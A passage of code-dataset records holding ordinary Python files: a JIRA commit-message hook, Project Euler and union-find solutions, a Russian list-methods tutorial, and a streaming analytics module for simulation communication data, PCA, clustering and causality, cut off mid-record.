+{"seq_id":"456228363","text":"import re\nimport sys\n\nJIRA_ID_REGEX = re.compile(r\"[A-Z]+-\\d+\")\n\nMISSING_JIRA_ID_MSG = \"\"\"\nCommit message is missing [JIRA task id].\n\nInclude [JIRA task id] in commit message, like so:\n#################################\nABC-123 this is my commit message\n#################################\nwhere ABC-123 is a sample [JIRA task id].\n\nFor more details check:\nhttps://confluence.atlassian.com/adminjiracloud/integrating-with-development-tools-776636216.html\n\"\"\"\n\n\ndef jira_id_in_commit_msg(commit_msg: str) -> bool:\n return bool(re.match(JIRA_ID_REGEX, commit_msg))\n\n\ndef commit_msg_hook(commit_msg_filepath: str) -> None:\n \"\"\"Scans for valid jira task id in commit message\n\n https://pre-commit.com/#pre-commit-for-commit-messages\"\"\"\n\n with open(commit_msg_filepath) as commit_msg:\n if not jira_id_in_commit_msg(commit_msg.read()):\n sys.exit(MISSING_JIRA_ID_MSG)\n\n\nif __name__ == \"__main__\":\n commit_msg_hook(sys.argv[1])\n","sub_path":".hooks/jira_id/jira_id_check.py","file_name":"jira_id_check.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"471106735","text":"#!/usr/bin/env python3\n\"\"\"\nFile Name : Problem124.py\nDate started : 2013-01-18\nDate solved : 2013-3-27\nRun Time :\n\nThe radical of n, rad(n), is the product of distinct prime factors of n.\n For example, 504 = 2^3 * 3^2 * 7, so rad(504) = 2 * 3 * 7 = 42.\n\nIf we calculate rad(n) for 1 <= n <= 10, then sort them on rad(n), and sorting\n on n if the radical values are equal, we get:\n\n Unsorted Sorted\n n rad(n) n rad(n) k\n 1 1 1 1 1\n 2 2 2 2 2\n 3 3 4 2 3\n 4 2 8 2 4\n 5 5 3 3 5\n 6 6 9 3 6\n 7 7 5 5 7\n 8 2 6 6 8\n 9 3 7 7 9\n 10 10 10 10 10\n\nLet E(k) be the kth element in the sorted n column;\n for example, E(4) = 8 and E(6) = 9.\n\nIf rad(n) is sorted for 1 <= n <= 100000, find E(10000).\n\n\"\"\"\n\nimport project_euler\nimport functools\nimport project_euler.primes\n\nPROBLEM_NUMBER = 124\nSOLVED = 1\n\n\ndef _compare(this, other):\n if this[1] == other[1]:\n return this[0] - other[0]\n return this[1] - other[1]\n\n_primeFactorProducts = dict()\n\n\ndef getProd(n):\n if n < 2:\n return 1\n elif n in _primeFactorProducts:\n return _primeFactorProducts[n]\n elif primes.isprime(n):\n _primeFactorProducts[n] = n\n return n\n product = 1\n orig = n\n for i in project_euler.primes.generatePrimesUnder(n):\n if i > n:\n break\n if not n % i:\n while not n % i:\n n //= i\n product *= getProd(i)\n _primeFactorProducts[orig] = product\n return product\n\n\ndef problem124_1():\n radList = [(1, 1)]\n for base in range(2, 10 ** 6 + 1):\n pair = base, getProd(base)\n radList.append(pair)\n radList.sort(key=functools.cmp_to_key(_compare))\n return radList[9999]\n\n\ndef problem124(input_=None):\n radList = [(1, 1)]\n for base in range(2, 10 ** 6 + 1):\n pair = base, getProd(base)\n radList.append(pair)\n radList.sort(key=functools.cmp_to_key(_compare))\n return radList[9999]\n\n\ndef run():\n print(project_euler.print_timing(problem124))\n\nif __name__ == \"__main__\":\n run()\n","sub_path":"problems/Problem124.py","file_name":"Problem124.py","file_ext":"py","file_size_in_byte":2369,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"518828076","text":"class Solution:\n # @param A : integer\n # @param B : list of list of integers\n # @return a list of integers\n def find(self, u, parent):\n if parent[u] == u:\n return u\n par = self.find(parent[u], parent)\n parent[u] = par\n return par\n\n def union(self, u, v, parent, height):\n C = self.find(u, parent)\n D = self.find(v, parent)\n if C == D:\n return\n if height[C] > height[D]:\n parent[D] = C\n elif height[D] > height[C]:\n parent[C] = D\n else:\n height[C] += 1\n parent[D] = C\n\n def solve(self, A, B):\n height = [1] * (A + 1)\n parent = list(range(A + 1))\n ans = []\n for i in range(len(B)):\n type, u, v = B[i]\n if type == 0:\n self.union(u, v, parent, height)\n else:\n C = self.find(u, parent)\n D = self.find(v, parent)\n if C == D:\n ans.append(1)\n else:\n ans.append(0)\n return ans\n\n","sub_path":"Graph/road_inspection.py","file_name":"road_inspection.py","file_ext":"py","file_size_in_byte":1104,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"382207757","text":"\"\"\"Методы работы со списками\"\"\"\nA = []\nx = 10\nA.append(x) # Метод класса list, добавляет элемент в конец\nn = len(A) # Узнать длину списка\nx = A.pop() # Возвращает последний элемент и вытаскивает его из массива\n\n# Генераторы списков\nA = []\nfor x in range(10):\n A.append(x**2)\nprint(A)\n\nA = [x**2 for x in range(10)]\nprint(A)\n\n# Создать список из квадрратов четных элементов другого списка\nA = [1, 2, 3, 4, 5, 7, 12, 9, 6]\nB = []\nfor x in A:\n if x % 2 == 0:\n B.append(x**2)\n\nprint(A)\nprint(B)\n\nB = [x**2 for x in A if x % 2 == 0]\nprint(B)\n","sub_path":"MIPT_alg_struct/lect6/lists_methods.py","file_name":"lists_methods.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"}
+{"seq_id":"145019693","text":"import pandas as pd\nimport numpy as np\nimport time\nfrom collections import defaultdict\n\n# Change point detection\nfrom ipca_aff_cpd import IPCAAFFCPD\n\n# Progressive incremental PCA \nfrom prog_inc_pca import ProgIncPCA\n\n# Progressive K-means Clustering\nfrom prog_kmeans import ProgKMeans\n\n# Progressive Causality\nfrom prog_causality import ProgCausality\n\nclass StreamDataAnalytics:\n def __init__(self, data, granularity, cluster_metric, calc_metrics, causality_metrics, communication_metrics, time_domain, this_metric):\n self.count = 0\n self.granularity = granularity\n self.time_domain = time_domain\n self.communication_metrics = communication_metrics\n self.calc_metrics = calc_metrics\n self.causality_metrics = causality_metrics\n self.cluster_metric = cluster_metric\n self.this_metric = this_metric\n\n self.df = pd.DataFrame(data)\n self.df['RbPrim'] = self.df['RbTotal'] - self.df['RbSec']\n self.incoming_df = self.df\n self.new_data_df = self.df\n\n self.pe_count = len(self.df['Peid'].unique())\n self.kp_count = len(self.df['Kpid'].unique())\n \n self.metric_df = self.preprocess(self.df)\n # set new_data_df for the first stream as metric_df\n self.whole_data_df = self.metric_df\n \n # If granularity is KP, send both Kp and Pe data. \n if(self.granularity == 'Kpid'):\n self.communication_metrics.append(self.granularity)\n self.communication_metrics.append('Peid')\n else:\n self.communication_metrics.append(self.granularity)\n\n self.algo_clustering = 'kmeans'\n\n self.cpd = CPD()\n self.pca = PCA()\n self.causal = Causal()\n self.clustering = Clustering()\n self.results = pd.DataFrame(data=self.df[granularity].astype(np.float64).tolist(), columns=[granularity])\n self._time = self.metric_df.columns.get_level_values(1).tolist()\n self.granIDs = self.df[self.granularity]\n \n def schema(self):\n schema = {k:self.process_type(type(v).__name__) for k,v in self.df.iloc[0].items()}\n return (self.results.to_dict('records'), schema)\n\n # Enforce python data types when numpy data types are used.\n # This is mainly done because JSON format does not work with numpy's data types.\n def process_type(self, type):\n if(type == 'int64'):\n return 'int'\n if(type == 'float64'):\n return 'float'\n if(type == 'list'):\n return 'int'\n\n # Return the current KP matrix. \n def kp_matrix(self):\n ret = np.zeros([self.incoming_df.shape[0], self.incoming_df.shape[0]])\n for idx, row in self.incoming_df.iterrows():\n ret[idx] = row['CommData']\n return ret\n \n def comm_data(self):\n if(self.granularity == 'KpGid'):\n self.communication_metrics.append('Peid')\n self.communication_metrics.append('Kpid')\n\n # Remove unnecessary columns from df\n df = self.incoming_df[self.communication_metrics]\n \n # columns get duplicated somehow. Not sure why?\n df = df.loc[:,~df.columns.duplicated()]\n\n # Group by Pe to Pe level data.\n group_df = df.groupby(['Peid'])\n\n # Number of PEs = number of groups\n pe_count = group_df.ngroups\n\n min_pe_comm = 0\n max_pe_comm = 0\n pe_comm_arr = []\n # Loop through each key.\n for key, group in group_df:\n pe_df = group_df.get_group(key)\n\n # Get the required information.\n comm_data_series = pe_df['CommData']\n kpid = pe_df['Kpid']\n peid = pe_df['Peid'].unique()[0]\n \n # Calculate the inter communication between the PEs.\n mean_comm = []\n for idx, row in enumerate(comm_data_series):\n kp_mean_comm = []\n for i in range(0, pe_count):\n pe_comm = row[i*self.kp_count: (i+1)*self.kp_count]\n mean_pe_comm = np.sum(np.array(pe_comm), axis=0)\n kp_mean_comm.append(mean_pe_comm)\n mean_comm.append(kp_mean_comm)\n \n # Calculate the mean across all KPs\n pe_comm_np = np.mean(np.array(mean_comm).T, axis=1)\n pe_comm_list = pe_comm_np.tolist()\n min_pe_comm = min(min_pe_comm, np.min(pe_comm_np))\n max_pe_comm = max(max_pe_comm, np.max(pe_comm_np))\n pe_comm_arr.append(pe_comm_list)\n\n ret_df = self.incoming_df[self.communication_metrics]\n schema = {k:self.process_type(type(v).__name__) for k,v in ret_df.iloc[0].items()}\n return {\n \"kp_comm\": ret_df.to_dict('records'),\n \"pe_comm\": pe_comm_arr,\n \"kp_count\": self.kp_count,\n \"pe_count\": self.pe_count,\n \"min_comm\": min_pe_comm,\n \"max_comm\": max_pe_comm,\n \"schema\": schema\n }\n \n def comm_df_time(self, df, time):\n # Drop columns we dont need.\n df = self.df[self.communication_metrics]\n\n # columns get duplicated somehow. Not sure why?\n df = df.loc[:,~df.columns.duplicated()]\n\n # Get the rows with self.time_domain == time. \n time1 = time - 100.0\n time2 = time + 100.0\n # print(\"Times: {0}, {1}\", time1, time2)\n df = df.loc[df[self.time_domain].between(time1, time2) == True]\n\n # print(\"df info: {1} shape {0}, \".format(df.shape, df[self.time_domain].unique()))\n return df\n\n ################################################\n # PE and KP communication for normal Comm data.\n ################################################\n def comm_df_to_pe_matrix(self, df, group_by):\n group_df = df.groupby([group_by])\n\n min_pe_comm = 0\n max_pe_comm = 0\n pe_comm_arr = []\n # Loop through each key.\n for key, group in group_df:\n # Group the df. \n pe_df = group_df.get_group(key)\n\n # Get the required information.\n comm_data_series = pe_df['CommData']\n kpid = pe_df['Kpid']\n peid = pe_df['Peid'].unique()[0]\n\n # Calculate the inter communication between the PEs.\n mean_comm = []\n for idx, row in enumerate(comm_data_series):\n kp_mean_comm = []\n for i in range(0, self.pe_count):\n pe_comm = row[i*self.kp_count: (i+1)*self.kp_count]\n mean_pe_comm = np.sum(np.array(pe_comm), axis=0)\n kp_mean_comm.append(mean_pe_comm)\n mean_comm.append(kp_mean_comm)\n \n # Calculate the mean across all KPs\n pe_comm_np = np.mean(np.array(mean_comm).T, axis=1)\n pe_comm_list = pe_comm_np.tolist()\n min_pe_comm = min(min_pe_comm, np.min(pe_comm_np))\n max_pe_comm = max(max_pe_comm, np.max(pe_comm_np))\n pe_comm_arr.append(pe_comm_list)\n return [pe_comm_arr, min_pe_comm, max_pe_comm]\n\n def comm_df_to_kp_matrix(self, df, group_by):\n group_df = df.groupby([group_by])\n\n # create the matrix we need to send. \n number_of_pes = self.pe_count*self.kp_count\n kp_comm_matrix_shape = (number_of_pes, number_of_pes)\n kp_comm_matrix = np.zeros(shape=kp_comm_matrix_shape)\n \n # Loop through the communication at each sampled timepoint.\n for key, item in group_df:\n key_df = group_df.get_group(key)\n\n number_of_times = len(key_df[self.time_domain].unique())\n kp_comm_time_matrix_shape = (number_of_times, number_of_pes)\n\n kp_matrix = np.zeros(shape=kp_comm_time_matrix_shape)\n for idx, row in key_df.iterrows():\n # Get index of this sample. \n peid = row['Peid']\n kpid = row['Kpid']\n index = peid*self.kp_count + kpid\n\n kp_time_group_df = key_df.groupby([self.time_domain])\n\n time_idx = 0\n for time, time_item in kp_time_group_df:\n time_df = kp_time_group_df.get_group(time)\n kp_matrix[time_idx] = time_df['CommData'].tolist()[0]\n time_idx += 1\n \n # Sum the matrices we got. \n kp_matrix_sum = kp_matrix.sum(axis = 0)\n \n # For average of the runtimes use this. \n # kp_matrix_avg = np.divide(kp_matrix_sum, number_of_pes)\n \n kp_comm_matrix[index] = kp_matrix_sum\n \n return kp_comm_matrix\n\n ########################################################\n # Base communication\n ########################################################\n def comm_data_base(self, time):\n if time == None:\n time = self.incoming_df[self.time_domain].unique()[0]\n\n # Append both KpId and PeId when analysing at KP granularity. \n if(self.granularity == 'KpGid'):\n self.communication_metrics.append('Peid')\n self.communication_metrics.append('Kpid')\n\n df_time = self.comm_df_time(self.df, time)\n df_time = df_time.sort_values(['KpGid'])\n pe_matrix_results = self.comm_df_to_pe_matrix(df_time, 'Peid')\n kp_matrix = self.comm_df_to_kp_matrix(df_time, 'KpGid') \n return {\n 'data': df_time.to_dict('records'),\n \"kp_comm\": kp_matrix.tolist(),\n \"pe_comm\": pe_matrix_results[0],\n \"kp_count\": self.kp_count,\n \"pe_count\": self.pe_count,\n \"min_comm\": pe_matrix_results[1],\n \"max_comm\": pe_matrix_results[2],\n }\n\n ########################################################\n # Interval communication\n ########################################################\n def comm_data_interval(self, interval):\n if(self.granularity == 'KpGid'):\n self.communication_metrics.append('Peid')\n self.communication_metrics.append('Kpid')\n\n # Drop columns we dont need.\n df = self.df[self.communication_metrics]\n \n # columns get duplicated somehow. Not sure why?\n df = df.loc[:,~df.columns.duplicated()]\n\n # Filter between the time ranges\n filter_df = df.loc[df[self.time_domain].between(interval[0], interval[1]) == True]\n \n # Remove duplicated columns. Not sure why this happens.\n filter_df = filter_df.loc[:,~filter_df.columns.duplicated()]\n\n # Find number of Kps in the run.\n pe_count = len(self.df['Peid'].unique())\n kp_count = len(self.df['Kpid'].unique())\n \n # Group by the KpGid\n # group_df = filter_df.groupby(['Peid', 'Kpid'])\n group_df = filter_df.groupby(['KpGid'])\n unique_ids = filter_df[self.granularity].unique()\n \n # Drop columns in the return df\n # kp_comm_df = self.incoming_df[self.communication_metrics]\n \n # create the matrix we need to send. \n number_of_pes = pe_count*kp_count\n kp_comm_matrix_shape = (number_of_pes, number_of_pes)\n kp_comm_matrix = np.zeros(shape=kp_comm_matrix_shape)\n \n # Loop through the communication at each sampled timepoint.\n for key, item in group_df:\n key_df = group_df.get_group(key)\n\n number_of_times = len(key_df[self.time_domain].unique())\n kp_comm_time_matrix_shape = (number_of_times, number_of_pes)\n\n kp_matrix = np.zeros(shape=kp_comm_time_matrix_shape)\n for idx, row in key_df.iterrows():\n # Get index of this sample. \n peid = row['Peid']\n kpid = row['Kpid']\n index = peid*kp_count + kpid\n\n kp_time_group_df = key_df.groupby([self.time_domain])\n\n time_idx = 0\n for time, time_item in kp_time_group_df:\n time_df = kp_time_group_df.get_group(time)\n kp_matrix[time_idx] = time_df['CommData'].tolist()[0]\n time_idx += 1\n \n # Sum the matrices we got. \n kp_matrix_sum = kp_matrix.sum(axis = 0)\n\n # For average of the runtimes use this. \n kp_matrix_avg = np.divide(kp_matrix_sum, number_of_times)\n \n kp_comm_matrix[index] = kp_matrix_avg\n\n ### PE level communication ###\n\n # Group by Pe to Pe level data.\n group_df = filter_df.groupby(['Peid'])\n\n # Number of PEs = number of groups\n pe_count = group_df.ngroups\n\n max_pe_comm = 0\n min_pe_comm = 0\n pe_comm_matrix = []\n # Loop through each key.\n for key, group in group_df:\n pe_df = group_df.get_group(key)\n\n pe_matrix_shape = (number_of_times, number_of_pes, number_of_pes)\n\n pe_matrix = np.zeros(shape = pe_matrix_shape)\n pe_time_group_df = pe_df.groupby([self.time_domain])\n\n time_idx = 0\n for time, time_item in pe_time_group_df:\n time_df = pe_time_group_df.get_group(time)\n for time_df_idx, time_df_row in time_df.iterrows():\n kpGid = time_df_row['KpGid']\n pe_matrix[time_idx][kpGid] = time_df_row['CommData']\n time_idx += 1\n\n pe_matrix_sum = pe_matrix.sum(axis = 0)\n\n pe_matrix_avg = np.divide(pe_matrix_sum, number_of_times)\n\n # Get the required information.\n comm_data_series = pe_matrix_sum\n\n kpid = pe_df['Kpid']\n peid = pe_df['Peid'].unique()[0]\n \n # Get number of KPs.\n kp_count = len(pe_df['Kpid'].unique())\n\n # Calculate the inter communication between the PEs.\n mean_comm = []\n for idx, row in enumerate(comm_data_series):\n kp_mean_comm = []\n for i in range(0, pe_count):\n pe_comm = row[i*kp_count: (i+1)*kp_count]\n mean_pe_comm = np.sum(np.array(pe_comm), axis=0)\n kp_mean_comm.append(mean_pe_comm)\n mean_comm.append(kp_mean_comm)\n \n # Calculate the mean across all KPs\n pe_comm_np = np.mean(np.array(mean_comm), axis=0)\n\n # Set maximum communication\n max_pe_comm = max(max_pe_comm, np.max(pe_comm_np))\n\n # Set minimum communication\n min_pe_comm = min(min_pe_comm, np.min(pe_comm_np))\n\n pe_comm_list = pe_comm_np.tolist()\n pe_comm_matrix.append(pe_comm_list)\n \n ret_df = self.incoming_df[self.communication_metrics]\n schema = {k:self.process_type(type(v).__name__) for k,v in ret_df.iloc[0].items()}\n result = {\n \"data\": ret_df.to_dict('records'), \n \"aggr_kp_comm\": kp_comm_matrix.tolist(),\n \"aggr_pe_comm\": pe_comm_matrix,\n \"kp_count\": kp_count,\n \"pe_count\": pe_count,\n 'max_comm': max_pe_comm,\n 'min_comm': min_pe_comm,\n \"schema\": schema\n }\n\n return result\n\n # Generic groupby a keys. \n def groupby(self, df, keys, metric = 'mean'):\n # Groups data by the keys provided\n self.groups = df.groupby(keys)\n measure = getattr(self.groups, metric)\n self.data = measure() \n\n # Process (Group the data) for all cluster_metrics\n def preprocess(self, df):\n # Group the data by granularity (PE, KP, LP) and time. \n # Converts into a table and the shape is (number of processing elements, number of time steps)\n self.groupby(df, [self.granularity, self.time_domain])\n table = pd.pivot_table(df, values=[self.this_metric], index=[self.granularity], columns=[self.time_domain])\n self.current_time = table.columns\n return table\n\n # Process (Group the data) only for a specific metric. \n def processByMetric(self, df, metric):\n self.groupby(df, [self.granularity, self.time_domain])\n table = pd.pivot_table(df, values=[metric], index=[self.granularity], columns=[self.time_domain], fill_value=0)\n column_names = []\n for name, group in self.groups:\n column_names.append(name[1])\n table.columns = list(set(column_names))\n return table\n\n def drop_prev_results(self, attrs): \n self.results.drop(attrs, axis=1, inplace=True)\n \n # Update in the data.\n def update(self, new_data):\n self.whole_data_df = pd.DataFrame(new_data)\n self.whole_data_df['RbPrim'] = self.whole_data_df['RbTotal'] - self.whole_data_df['RbSec'] \n self.incoming_df = self.whole_data_df\n self.df = pd.concat([self.df, self.whole_data_df]) \n self.new_data_df = self.preprocess(self.whole_data_df)\n # To avoid Nan values while concat\n self.metric_df.reset_index(drop=True, inplace=True)\n self.new_data_df.reset_index(drop=True, inplace=True)\n self.metric_df = pd.concat([self.metric_df, self.new_data_df], axis=1).T.drop_duplicates().T\n self.count = self.count + 1\n self._time = self.metric_df.columns.get_level_values(1).tolist()\n self.granIDs = self.df[self.granularity]\n return self \n\n # Method to remove the data on request.\n # not sure if it works like it needs to be. \n def deupdate(self, remove_data):\n self.whole_data_df = pd.DataFrame(remove_data)\n this_time = self.whole_data_df[self.time_domain].unique()[0]\n self.df = self.df[self.df[self.time_domain] != this_time]\n self.count = self.count - 1\n self._time = this_time\n self.granIDs = self.df[self.granularity] \n return self\n\n # Clear the results. \n def clean_up(self):\n if(self.count > 2):\n self.drop_prev_results(['cpd'])\n self.drop_prev_results(['from_metrics','from_causality','from_IR_1', 'from_VD_1',\n 'to_metrics', 'to_causality', 'to_IR_1', 'to_VD_1'\n ])\n self.drop_prev_results(['PC0','PC1'])\n if(self.algo_clustering == 'evostream'):\n self.drop_prev_results(['ids', 'normal', 'normal_clusters', 'normal_times','micro', 'micro_clusters', 'macro', 'macro_clusters', 'macro_times', 'micro_times'])\n elif(self.algo_clustering == 'kmeans'):\n self.drop_prev_results(['ids', 'normal', 'normal_clusters', 'normal_times', 'macro', 'macro_clusters', 'macro_times',])\n\n # Main run method that triggers the analysis. \n def run(self, data, algo):\n self.clean_up()\n clustering_result = self.clustering.tick(data)\n pca_result = self.pca.tick(data, algo['pca'])\n cpd_result = self.cpd.tick(data, algo['cpd'])\n causal_result = self.causal.tick(data, algo['causality'])\n \n if(self.count >= 2):\n self.results = self.results.join(clustering_result)\n self.results = self.results.join(pca_result)\n self.results = self.results.join(cpd_result)\n self.results = self.results.join(causal_result)\n self.results = self.results.fillna(0) \n return self.schema()\n\n # Write the metric_df to a csv file\n def to_csv(self, filename, metric):\n self.results.to_csv(str(filename) + str(self.cluster_metric) + '.csv')\n\n # Read from csv file. \n def from_csv(self, filename, metric):\n self.results = pd.read_csv(str(filename) + str(self.cluster_metric) + '.csv')\n return self.schema()\n\n# Class to perform change point detection for streaming data.\nclass CPD(StreamDataAnalytics):\n # Stores the change points recorded.\n def __init__(self):\n self.cps = []\n self.alpha = 0.1\n self.aff_obj = IPCAAFFCPD(alpha=self.alpha)\n\n # Return data's schema.\n def schema(self, result, count):\n cpd = [(result)]\n cpd_result = pd.DataFrame(cpd, columns=['cpd'])\n return cpd_result\n\n # Tick is the procedure that gets executed when there is new data.\n def tick(self, data, method):\n ret = False\n self.new_data_df = data.new_data_df\n self.count = data.count\n self.current_time = data.current_time\n self.method = method\n if(self.count == 1):\n if(self.method == 'aff'):\n result = self.aff()\n else:\n if(self.method == 'aff'):\n result = self.aff_update()\n return self.schema(result, self.count)\n\n # Getter to return the change points.\n def get_change_points(self):\n return self.cps\n \n # perform adaptive forgetting factor CPD\n def aff(self):\n X = np.array(self.new_data_df)\n Xt = X.transpose()\n \n change = self.aff_obj.feed_predict(Xt[0, :])\n if change:\n self.cps.append(0)\n print('Change', 0)\n return 1\n else:\n return 0\n \n # Progressive update using adaptive forgetting factor. \n def aff_update(self):\n X = np.array(self.new_data_df[self.current_time])\n Xt = X.transpose()\n change = self.aff_obj.feed_predict(Xt[0, :])\n if(change):\n self.cps.append(self.count)\n print('Change', self.count)\n return 1\n else:\n # print('No-change#######################', self.count)\n return 0\n\n# Class to perform progressive PCA.\nclass PCA(StreamDataAnalytics):\n def __init__(self):\n self.n_components = 2\n self.time_series = np.array([])\n self.pcs_curr = np.array([])\n self.pcs_new = np.array([]) \n self.pcs_curr_bg = np.array([])\n\n # Controls the schema to return the data.\n def schema(self):\n return pd.DataFrame(data = self.pcs_curr, columns = ['PC%d' %x for x in range(0, self.n_components)])\n\n # Tick is the procedure that gets executed when there is new data.\n def tick(self, data, method):\n self.metric_df = data.metric_df\n self.new_data_df = data.new_data_df\n self.method = method\n self.count = data.count\n\n if(self.count < 2):\n pass\n elif(self.count == 2):\n if(method == 'prog_inc'):\n self.prog_inc()\n return self.schema()\n else:\n if(self.method == 'prog_inc'):\n self.prog_inc_update()\n return self.schema()\n \n # Performs progressive incremental PCA. \n def prog_inc(self):\n pca = ProgIncPCA(2, 1.0)\n self.time_series = self.metric_df.values\n pca.progressive_fit(self.time_series, 10, \"random\")\n self.pcs_curr = pca.transform(self.time_series) \n pca.get_loadings()\n\n # Performs update on data for progressive incremental PCA. \n def prog_inc_update(self):\n new_time_series = self.new_data_df.values\n self.time_series = np.append(self.time_series, new_time_series, 1)\n pca = ProgIncPCA(2, 1.0)\n pca.progressive_fit(self.time_series, latency_limit_in_msec = 10)\n self.pcs_new = pca.transform(self.time_series)\n self.pcs_curr = ProgIncPCA.geom_trans(self.pcs_curr, self.pcs_new)\n\n\n# Class to perform Progressive clustering. \nclass Clustering(StreamDataAnalytics):\n def __init__(self):\n self.n_clusters = 3\n self.mutation_rate = 0.1\n self.fit_latency_limit_in_msec = 10\n self.refine_latency_limit_in_msec = 30\n self.labels = np.array([])\n self.labels_macro = np.array([])\n self.labels_micro = np.array([])\n self.times_macro = np.array([])\n self.times_micro = np.array([])\n\n # Format for kmeans streaming. \n def schema(self):\n normal = [(self.time_series.tolist(), self.labels, self._time, self.granIDs.tolist())]\n macro = [(self.time_series_macro.tolist(), self.labels_macro, self._time)]\n normal_result = pd.DataFrame(data=normal, columns=['normal', 'normal_clusters', 'normal_times', 'ids'])\n macro_result = pd.DataFrame(data=macro, columns=['macro', 'macro_clusters', 'macro_times'])\n return [normal_result, macro_result]\n\n # Main procedure to control data updates. \n def tick(self, data):\n self.metric_df = data.metric_df\n self.new_data_df = data.new_data_df\n self.algo = data.algo_clustering\n self._time = data._time\n self.granIDs = data.granIDs\n self.granularity = data.granularity\n self.count = data.count \n\n if(self.algo == 'kmeans'):\n if(self.count < 2):\n return {}\n if(self.count == 2):\n self.kmeans()\n elif(self.count > 2):\n self.kmeans_update()\n self.kmeans_macro()\n return self.schema()\n\n def emptyCurrentToPrev(self):\n ret = {}\n for idx in range(self.n_clusters):\n ret[idx] = 0\n return ret\n\n # Main procedure to perform kmeans progressive. \n def kmeans(self):\n self.time_series = self.metric_df.values\n self.evo = ProgKMeans(n_clusters=self.n_clusters)\n self.evo.progressive_fit(self.time_series, latency_limit_in_msec=self.fit_latency_limit_in_msec)\n self.labels = self.evo.predict(self.time_series).tolist()\n self.current_to_prev = self.emptyCurrentToPrev()\n\n # When there is new data, this function is triggered. \n def kmeans_update(self):\n new_time_series = self.new_data_df.values\n self.time_series = np.append(self.time_series, new_time_series, 1)\n self.evo.progressive_fit(self.time_series, latency_limit_in_msec=self.fit_latency_limit_in_msec, point_choice_method=\"fromPrevCluster\", verbose=True)\n self.labels, self.current_to_prev = self.evo.consistent_labels(self.labels, self.evo.predict(self.time_series))\n\n # Calculate the macro clustering from PCA. \n def kmeans_macro(self):\n self.time_series_macro = np.array(self.evo.get_centers())\n self.labels_macro = [self.current_to_prev[i] for i in range(self.time_series_macro.shape[0])]\n self.times_macro = np.array(self._time)\n\n# Class to perform causality analysis. \nclass Causal(StreamDataAnalytics):\n def __init__(self):\n self.pivot_table_results = {}\n\n # Convert numpy bool format to bool. \n def numpybool_to_bool(self, arr):\n ret = []\n for idx, val in enumerate(arr):\n if(val == True):\n ret.append(1)\n elif(val == False):\n ret.append(0)\n else:\n ret.append(-1)\n return ret\n\n # Flatten a list\n def flatten(self, l):\n flat_list = []\n for sublist in l:\n for item in sublist:\n flat_list.append(item)\n return flat_list\n\n # Main procedure to control when data updates occur. \n def tick(self, data, method):\n self.df = data.whole_data_df\n self.incoming_df = data.incoming_df\n self.cluster_metric = data.cluster_metric\n self.time_domain = data.time_domain\n self.granularity = data.granularity\n self.causality_metrics = data.causality_metrics\n \n self.data_metrics = ['NetworkRecv', 'NetworkSend', 'NeventProcessed', 'RbSec', 'NeventRb', 'RbTotal', 'RbPrim', 'NetReadTime', 'FcAttempts', 'EventTies', 'EventProcTime']\n self.calc_metrics = ['NetworkRecv', 'NetworkSend', 'NeventProcessed', 'RbSec', 'NeventRb', 'RbTotal', 'RbPrim', 'NetReadTime', 'FcAttempts', 'EventTies', 'EventProcTime']\n\n self.data_metrics.append(self.granularity)\n self.data_metrics.append(self.time_domain)\n\n pca = ProgIncPCA(1)\n total_latency_for_pca = 100\n latency_for_each = int(total_latency_for_pca / len(self.data_metrics))\n n = self.incoming_df.shape[0]\n X = np.empty(shape=(n, len(self.data_metrics)))\n self.df = self.df[self.data_metrics] \n\n for i, metric in enumerate(self.calc_metrics):\n start = time.time()\n metric_pd = data.processByMetric(self.df, metric)\n if(metric not in self.pivot_table_results):\n self.pivot_table_results[metric] = metric_pd\n else:\n self.pivot_table_results[metric] = pd.concat([self.pivot_table_results[metric], metric_pd], axis=1)\n metric_pd = self.pivot_table_results[metric]\n metric_nd = metric_pd.values\n \n pca.progressive_fit(\n metric_nd,\n latency_limit_in_msec=latency_for_each,\n point_choice_method='random',\n verbose=False)\n metric_1d = pca.transform(metric_nd)\n X[:, i] = metric_1d[:, 0]\n\n X = pd.DataFrame(X, columns=self.data_metrics)\n X = X[self.causality_metrics]\n is_non_const_col = (X != X.iloc[0]).any()\n X = X.loc[:, is_non_const_col]\n X = X.replace([np.inf, -np.inf], np.nan)\n X = X.fillna(0.0)\n\n causality_from = pd.DataFrame(\n index=[0], columns=self.causality_metrics).fillna(False)\n causality_to = pd.DataFrame(\n index=[0], columns=self.causality_metrics).fillna(False)\n\n ir_from = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n ir_to = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n\n vd_from = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n vd_to = pd.DataFrame(index=[0], columns=self.causality_metrics).fillna(0.0)\n\n if is_non_const_col.loc[self.cluster_metric]:\n causality = ProgCausality()\n causality.adaptive_progresive_var_fit(\n X, latency_limit_in_msec=100, point_choice_method=\"reverse\")\n\n causality_from, causality_to = causality.check_causality(self.cluster_metric, signif=0.1)\n\n try:\n tmp_ir_from, tmp_ir_to = causality.impulse_response(\n self.cluster_metric)\n ir_from.loc[0, is_non_const_col] = tmp_ir_from[:, 1]\n ir_to.loc[0, is_non_const_col] = tmp_ir_to[:, 1]\n except:\n b = 1\n \n try:\n tmp_vd_from, tmp_vd_to = causality.variance_decomp(self.cluster_metric)\n vd_from.loc[0, is_non_const_col] = tmp_vd_from[:, 1]\n vd_to.loc[0, is_non_const_col] = tmp_vd_to[:, 1]\n except:\n a = 1\n \n causality_from = causality_from\n causality_to = causality_to\n ir_from = ir_from.loc[0, :].tolist()\n ir_to = ir_to.loc[0, :].tolist()\n vd_from = vd_from.loc[0, :].tolist()\n vd_to = vd_to.loc[0, :].tolist()\n\n \n from_ = [(self.causality_metrics, self.numpybool_to_bool(causality_from),\n ir_from, vd_from)]\n to_ = [(self.causality_metrics, self.numpybool_to_bool(causality_to), ir_to,\n vd_to)]\n \n from_result = pd.DataFrame(\n data=from_,\n columns=[\n 'from_metrics', 'from_causality', 'from_IR_1', 'from_VD_1'\n ])\n to_result = pd.DataFrame(\n data=to_,\n columns=['to_metrics', 'to_causality', 'to_IR_1', 'to_VD_1'])\n\n return [from_result, 